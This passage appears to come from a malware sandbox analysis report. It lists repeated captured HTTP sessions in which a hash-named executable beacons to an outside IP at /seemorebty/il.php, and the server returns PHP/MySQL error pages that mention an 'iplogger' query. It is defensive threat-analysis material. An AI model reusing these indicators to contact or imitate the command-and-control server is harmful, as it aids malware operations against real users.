<b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0
Oct 7, 2022 15:59:24.648972988 CEST	777	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49713	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:59:26.926707029 CEST	940	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:59:26.957473040 CEST	941	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49715	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:59:46.423841000 CEST	1093	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:59:46.451282024 CEST	1094	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49717	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:59:48.582084894 CEST	1244	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:59:48.609190941 CEST	1246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49719	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 16:00:13.961204052 CEST	1410	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 16:00:13.993751049 CEST	1411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 14:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in 